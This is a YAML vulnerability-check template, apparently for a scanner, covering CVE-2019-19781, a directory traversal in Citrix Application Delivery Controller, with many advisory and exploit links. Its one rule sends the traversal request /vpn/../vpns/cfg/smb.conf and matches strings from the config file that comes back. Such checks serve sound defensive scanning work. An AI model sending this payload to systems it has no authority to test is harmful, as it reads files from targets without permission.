name: yaml-poc-citrix-application_delivery_controller-directory_traversal-CVE-2019-19781
binding: 4a4bc434-b631-4381-885e-2689b4964afb
detail:
    author: system_user
    links:
        - http://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html
        - http://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html
        - http://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html
        - http://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html
        - http://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html
        - https://badpackets.net/over-25000-citrix-netscaler-endpoints-vulnerable-to-cve-2019-19781/
        - https://forms.gle/eDf3DXZAv96oosfj6
        - https://nvd.nist.gov/vuln/detail/CVE-2019-19781
        - https://packetstormsecurity.com/files/155904/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution.html
        - https://packetstormsecurity.com/files/155905/Citrix-Application-Delivery-Controller-Gateway-Remote-Code-Execution-Traversal.html
        - https://packetstormsecurity.com/files/155930/Citrix-Application-Delivery-Controller-Gateway-10.5-Remote-Code-Execution.html
        - https://packetstormsecurity.com/files/155947/Citrix-ADC-NetScaler-Directory-Traversal-Remote-Code-Execution.html
        - https://packetstormsecurity.com/files/155972/Citrix-ADC-Gateway-Path-Traversal.html
        - https://support.citrix.com/article/CTX267027
        - https://twitter.com/bad_packets/status/1215431625766424576
        - https://www.auscert.org.au/bulletins/ESB-2019.4708.4/
        - https://www.auscert.org.au/bulletins/ESB-2019.4708.8/
        - https://www.auscert.org.au/bulletins/ESB-2019.4708/
        - https://www.exploit-db.com/exploits/47901
        - https://www.exploit-db.com/exploits/47930
        - https://www.kb.cert.org/vuls/id/619785
        - https://www.kb.cert.org/vuls/id/619785/
    vulnerability:
        id: 3af95486-cda3-4783-9c61-c958eb2177d3
        level: critical
    warning: Harmless
transport: http
rules:
    r0:
        request:
            cache: true
            method: GET
            path: /vpn/../vpns/cfg/smb.conf
            follow_redirects: false
        expression: response.status == 200 && response.body.bcontains(b"encrypt passwords") && response.body.bcontains(b"name resolve order")
expression: r0()
